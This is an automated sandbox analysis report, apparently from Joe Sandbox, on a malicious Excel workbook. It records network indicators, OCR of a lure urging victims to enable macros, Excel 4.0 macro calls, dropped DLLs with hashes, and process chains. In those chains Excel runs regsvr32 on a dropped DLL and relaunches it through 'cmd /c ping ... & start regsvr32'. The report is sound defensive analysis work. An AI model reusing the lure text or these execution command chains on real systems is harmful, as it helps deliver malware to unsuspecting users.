    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://outlook.office.com/
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://outlook.office365.com/
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://settings.outlook.com
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://staging.cortana.ai
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://store.office.com/addinstemplate
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://tasks.office.com
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://templatelogging.office.com/client/log
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://webshell.suite.office.com
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://wus2.contentsync.
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://wus2.pagecontentsync.
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://www.odwebp.svc.ms
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
    Source: unknownHTTPS traffic detected: 107.180.50.232:443 -> 192.168.2.6:49715 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 18.117.84.120:443 -> 192.168.2.6:49740 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 18.117.84.120:443 -> 192.168.2.6:49747 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 18.117.84.120:443 -> 192.168.2.6:49750 version: TLS 1.2

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 8Screenshot OCR: Enable editing " to unlock the editing document downloaded from the ir 13 " 14 PROTECTED VIEW Th
    Source: Screenshot number: 8Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start : '8 the decryption of documen
    Source: Screenshot number: 12Screenshot OCR: Enable editing " to unlock the editing document downloaded from the ir 13 " 14 PROTECTED VIEW Th
    Source: Screenshot number: 12Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start : '8 the decryption of documen
    Source: Screenshot number: 16Screenshot OCR: Enable editing " to unlock the editing document downloaded from the Internet. PROTECTED VIEW This f
    Source: Screenshot number: 16Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of document. E
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: Documents_13134976_1377491379.xlsbInitial sample: CALL
    Source: Documents_13134976_1377491379.xlsbInitial sample: EXEC
    Source: Documents_13134976_1377491379.xlsbInitial sample: CALL
    Office process drops PE fileShow sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\iepfusn.dllJump to dropped file
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\rtdsgfe[1].dllJump to dropped file
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00007FFD696A6DAE5_2_00007FFD696A6DAE
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00007FFD696B22545_2_00007FFD696B2254
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00007FFD696B8E185_2_00007FFD696B8E18
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00007FFD696AF1F05_2_00007FFD696AF1F0
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00007FFD696B35085_2_00007FFD696B3508
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00007FFD696A17885_2_00007FFD696A1788
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00007FFD696A204C5_2_00007FFD696A204C
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00007FFD696A12845_2_00007FFD696A1284
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_012D8D115_2_012D8D11
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_012D45545_2_012D4554
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_012E02A45_2_012E02A4
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_012D82825_2_012D8282
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_012D65375_2_012D6537
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_012D61185_2_012D6118
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_012D15175_2_012D1517
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_012DD57B5_2_012DD57B
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_012D85985_2_012D8598
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_012DE0075_2_012DE007
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_012DFC4D5_2_012DFC4D
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_012E0CE85_2_012E0CE8
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_012DA8E05_2_012DA8E0
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_012D2B265_2_012D2B26
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_012D9F065_2_012D9F06
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_012D3B015_2_012D3B01
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_012D7F125_2_012D7F12
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_012D53725_2_012D5372
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_012E26AC5_2_012E26AC
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_012DC6ED5_2_012DC6ED
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_012D5EF85_2_012D5EF8
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00007FFD69646DAE11_2_00007FFD69646DAE
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00007FFD6965225411_2_00007FFD69652254
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00007FFD69658E1811_2_00007FFD69658E18
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00007FFD6964F1F011_2_00007FFD6964F1F0
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00007FFD6965350811_2_00007FFD69653508
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00007FFD6964178811_2_00007FFD69641788
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00007FFD6964204C11_2_00007FFD6964204C
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00007FFD6964128411_2_00007FFD69641284
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_005C828211_2_005C8282
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_005D02A411_2_005D02A4
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_005CFC4D11_2_005CFC4D
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_005CE00711_2_005CE007
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_005D0CE811_2_005D0CE8
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_005CA8E011_2_005CA8E0
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_005C455411_2_005C4554
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_005CD57B11_2_005CD57B
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_005C611811_2_005C6118
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_005C151711_2_005C1517
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_005C8D1111_2_005C8D11
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_005C653711_2_005C6537
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_005C859811_2_005C8598
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_005C5EF811_2_005C5EF8
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_005CC6ED11_2_005CC6ED
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_005D26AC11_2_005D26AC
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_005C537211_2_005C5372
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_005C7F1211_2_005C7F12
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_005C9F0611_2_005C9F06
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_005C3B0111_2_005C3B01
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_005C2B2611_2_005C2B26
    Source: C:\Windows\System32\regsvr32.exeCode function: 18_2_0045A8E018_2_0045A8E0
    Source: C:\Windows\System32\regsvr32.exeCode function: 18_2_0045828218_2_00458282
    Source: C:\Windows\System32\regsvr32.exeCode function: 18_2_004602A418_2_004602A4
    Source: C:\Windows\System32\regsvr32.exeCode function: 18_2_0045FC4D18_2_0045FC4D
    Source: C:\Windows\System32\regsvr32.exeCode function: 18_2_0045455418_2_00454554
    Source: C:\Windows\System32\regsvr32.exeCode function: 18_2_0045C6ED18_2_0045C6ED
    Source: C:\Windows\System32\regsvr32.exeCode function: 18_2_00460CE818_2_00460CE8
    Source: C:\Windows\System32\regsvr32.exeCode function: 18_2_0045537218_2_00455372
    Source: C:\Windows\System32\regsvr32.exeCode function: 18_2_00455EF818_2_00455EF8
    Source: C:\Windows\System32\regsvr32.exeCode function: 18_2_0045D57B18_2_0045D57B
    Source: C:\Windows\System32\regsvr32.exeCode function: 18_2_0045E00718_2_0045E007
    Source: C:\Windows\System32\regsvr32.exeCode function: 18_2_00459F0618_2_00459F06
    Source: C:\Windows\System32\regsvr32.exeCode function: 18_2_00453B0118_2_00453B01
    Source: C:\Windows\System32\regsvr32.exeCode function: 18_2_0045151718_2_00451517
    Source: C:\Windows\System32\regsvr32.exeCode function: 18_2_00458D1118_2_00458D11
    Source: C:\Windows\System32\regsvr32.exeCode function: 18_2_00457F1218_2_00457F12
    Source: C:\Windows\System32\regsvr32.exeCode function: 18_2_0045859818_2_00458598
    Source: C:\Windows\System32\regsvr32.exeCode function: 18_2_0045611818_2_00456118
    Source: C:\Windows\System32\regsvr32.exeCode function: 18_2_00452B2618_2_00452B26
    Source: C:\Windows\System32\regsvr32.exeCode function: 18_2_004626AC18_2_004626AC
    Source: C:\Windows\System32\regsvr32.exeCode function: 18_2_0045653718_2_00456537
    Source: C:\Windows\System32\regsvr32.exeCode function: 25_2_00A202A425_2_00A202A4
    Source: C:\Windows\System32\regsvr32.exeCode function: 25_2_00A12B2625_2_00A12B26
    Source: C:\Windows\System32\regsvr32.exeCode function: 25_2_00A1653725_2_00A16537
    Source: C:\Windows\System32\regsvr32.exeCode function: 25_2_00A1455425_2_00A14554
    Source: C:\Windows\System32\regsvr32.exeCode function: 25_2_00A226AC25_2_00A226AC
    Source: C:\Windows\System32\regsvr32.exeCode function: 25_2_00A13B0125_2_00A13B01
    Source: C:\Windows\System32\regsvr32.exeCode function: 25_2_00A1828225_2_00A18282
    Source: C:\Windows\System32\regsvr32.exeCode function: 25_2_00A1E00725_2_00A1E007
    Source: C:\Windows\System32\regsvr32.exeCode function: 25_2_00A19F0625_2_00A19F06
    Source: C:\Windows\System32\regsvr32.exeCode function: 25_2_00A18D1125_2_00A18D11
    Source: C:\Windows\System32\regsvr32.exeCode function: 25_2_00A17F1225_2_00A17F12
    Source: C:\Windows\System32\regsvr32.exeCode function: 25_2_00A1151725_2_00A11517
    Source: C:\Windows\System32\regsvr32.exeCode function: 25_2_00A1859825_2_00A18598
    Source: C:\Windows\System32\regsvr32.exeCode function: 25_2_00A1611825_2_00A16118
    Source: C:\Windows\System32\regsvr32.exeCode function: 25_2_00A1A8E025_2_00A1A8E0
    Source: C:\Windows\System32\regsvr32.exeCode function: 25_2_00A20CE825_2_00A20CE8
    Source: C:\Windows\System32\regsvr32.exeCode function: 25_2_00A1C6ED25_2_00A1C6ED
    Source: C:\Windows\System32\regsvr32.exeCode function: 25_2_00A1537225_2_00A15372
    Source: C:\Windows\System32\regsvr32.exeCode function: 25_2_00A15EF825_2_00A15EF8
    Source: C:\Windows\System32\regsvr32.exeCode function: 25_2_00A1D57B25_2_00A1D57B
    Source: C:\Windows\System32\regsvr32.exeCode function: 25_2_00A1FC4D25_2_00A1FC4D
    Source: C:\Windows\System32\regsvr32.exeCode function: 26_2_00FD653726_2_00FD6537
    Source: C:\Windows\System32\regsvr32.exeCode function: 26_2_00FE02A426_2_00FE02A4
    Source: C:\Windows\System32\regsvr32.exeCode function: 26_2_00FD5EF826_2_00FD5EF8
    Source: C:\Windows\System32\regsvr32.exeCode function: 26_2_00FDD57B26_2_00FDD57B
    Source: C:\Windows\System32\regsvr32.exeCode function: 26_2_00FD537226_2_00FD5372
    Source: C:\Windows\System32\regsvr32.exeCode function: 26_2_00FDC6ED26_2_00FDC6ED
    Source: C:\Windows\System32\regsvr32.exeCode function: 26_2_00FE0CE826_2_00FE0CE8
    Source: C:\Windows\System32\regsvr32.exeCode function: 26_2_00FDA8E026_2_00FDA8E0
    Source: C:\Windows\System32\regsvr32.exeCode function: 26_2_00FD455426_2_00FD4554
    Source: C:\Windows\System32\regsvr32.exeCode function: 26_2_00FDFC4D26_2_00FDFC4D
    Source: C:\Windows\System32\regsvr32.exeCode function: 26_2_00FE26AC26_2_00FE26AC
    Source: C:\Windows\System32\regsvr32.exeCode function: 26_2_00FD2B2626_2_00FD2B26
    Source: C:\Windows\System32\regsvr32.exeCode function: 26_2_00FD859826_2_00FD8598
    Source: C:\Windows\System32\regsvr32.exeCode function: 26_2_00FD611826_2_00FD6118
    Source: C:\Windows\System32\regsvr32.exeCode function: 26_2_00FD151726_2_00FD1517
    Source: C:\Windows\System32\regsvr32.exeCode function: 26_2_00FD8D1126_2_00FD8D11
    Source: C:\Windows\System32\regsvr32.exeCode function: 26_2_00FD7F1226_2_00FD7F12
    Source: C:\Windows\System32\regsvr32.exeCode function: 26_2_00FDE00726_2_00FDE007
    Source: C:\Windows\System32\regsvr32.exeCode function: 26_2_00FD9F0626_2_00FD9F06
    Source: C:\Windows\System32\regsvr32.exeCode function: 26_2_00FD3B0126_2_00FD3B01
    Source: C:\Windows\System32\regsvr32.exeCode function: 26_2_00FD828226_2_00FD8282
    Source: C:\Windows\System32\regsvr32.exeCode function: 27_2_00B7653727_2_00B76537
    Source: C:\Windows\System32\regsvr32.exeCode function: 27_2_00B802A427_2_00B802A4
    Source: C:\Windows\System32\regsvr32.exeCode function: 27_2_00B7455427_2_00B74554
    Source: C:\Windows\System32\regsvr32.exeCode function: 27_2_00B72B2627_2_00B72B26
    Source: C:\Windows\System32\regsvr32.exeCode function: 27_2_00B826AC27_2_00B826AC
    Source: C:\Windows\System32\regsvr32.exeCode function: 27_2_00B7151727_2_00B71517
    Source: C:\Windows\System32\regsvr32.exeCode function: 27_2_00B77F1227_2_00B77F12
    Source: C:\Windows\System32\regsvr32.exeCode function: 27_2_00B78D1127_2_00B78D11
    Source: C:\Windows\System32\regsvr32.exeCode function: 27_2_00B7859827_2_00B78598
    Source: C:\Windows\System32\regsvr32.exeCode function: 27_2_00B7611827_2_00B76118
    Source: C:\Windows\System32\regsvr32.exeCode function: 27_2_00B7E00727_2_00B7E007
    Source: C:\Windows\System32\regsvr32.exeCode function: 27_2_00B79F0627_2_00B79F06
    Source: C:\Windows\System32\regsvr32.exeCode function: 27_2_00B7828227_2_00B78282
    Source: C:\Windows\System32\regsvr32.exeCode function: 27_2_00B73B0127_2_00B73B01
    Source: C:\Windows\System32\regsvr32.exeCode function: 27_2_00B7537227_2_00B75372
    Source: C:\Windows\System32\regsvr32.exeCode function: 27_2_00B7D57B27_2_00B7D57B
    Source: C:\Windows\System32\regsvr32.exeCode function: 27_2_00B75EF827_2_00B75EF8
    Source: C:\Windows\System32\regsvr32.exeCode function: 27_2_00B80CE827_2_00B80CE8
    Source: C:\Windows\System32\regsvr32.exeCode function: 27_2_00B7A8E027_2_00B7A8E0
    Source: C:\Windows\System32\regsvr32.exeCode function: 27_2_00B7C6ED27_2_00B7C6ED
    Source: C:\Windows\System32\regsvr32.exeCode function: 27_2_00B7FC4D27_2_00B7FC4D
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\rtdsgfe[1].dll 67E54B44DAD909734A59DF457950C05727B7ECF387F1F37C38C18CEF5AF579C2
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\L3YD7CE.dll 67E54B44DAD909734A59DF457950C05727B7ECF387F1F37C38C18CEF5AF579C2
    Source: Joe Sandbox ViewDropped File: C:\Users\user\iepfusn.dll 67E54B44DAD909734A59DF457950C05727B7ECF387F1F37C38C18CEF5AF579C2
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: classification engineClassification label: mal100.troj.expl.evad.winXLSB@28/13@1/4
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_012D4554 CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,Process32Next,5_2_012D4554
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
    Source: C:\Windows\System32\regsvr32.exeMutant created: \Sessions\1\BaseNamedObjects\NFIRRWAVEQLJNKX7G17J1Q
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6988:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5680:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1808:120:WilError_01
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{4F0D64AE-B9BF-48DC-A1ED-DB4CEC735B81} - OProcSessId.datJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\iepfusn.dll
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe -s ..\iepfusn.dll
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\cmd.exe cmd /c ping 8.8.7.7 -n 2 & start C:\Windows\system32\regsvr32.exe -s C:\Users\user\iepfusn.dll RV0KR
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 8.8.7.7 -n 2
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe -s C:\Users\user\iepfusn.dll RV0KR
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\cmd.exe cmd /c ping 8.8.7.7 -n 2 & start C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll N8DG
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 8.8.7.7 -n 2
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll N8DG
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\cmd.exe cmd /c ping 8.8.7.7 -n 2 & start C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll VE50DB
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 8.8.7.7 -n 2
    Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\system32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll VE50DB
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll VE50DB
    Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\system32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll VE50DB
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\iepfusn.dllJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe -s ..\iepfusn.dllJump to behavior
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\cmd.exe cmd /c ping 8.8.7.7 -n 2 & start C:\Windows\system32\regsvr32.exe -s C:\Users\user\iepfusn.dll RV0KRJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 8.8.7.7 -n 2 Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe -s C:\Users\user\iepfusn.dll RV0KRJump to behavior
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\cmd.exe cmd /c ping 8.8.7.7 -n 2 & start C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll N8DGJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 8.8.7.7 -n 2 Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll N8DGJump to behavior
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\cmd.exe cmd /c ping 8.8.7.7 -n 2 & start C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll VE50DBJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 8.8.7.7 -n 2 Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll VE50DBJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: Documents_13134976_1377491379.xlsbInitial sample: OLE zip file path = xl/media/image1.png
    Source: Documents_13134976_1377491379.xlsbInitial sample: OLE zip file path = xl/media/image2.png
    Source: Documents_13134976_1377491379.xlsbInitial sample: OLE zip file path = xl/media/image3.png
    Source: Documents_13134976_1377491379.xlsbInitial sample: OLE zip file path = xl/media/image4.png
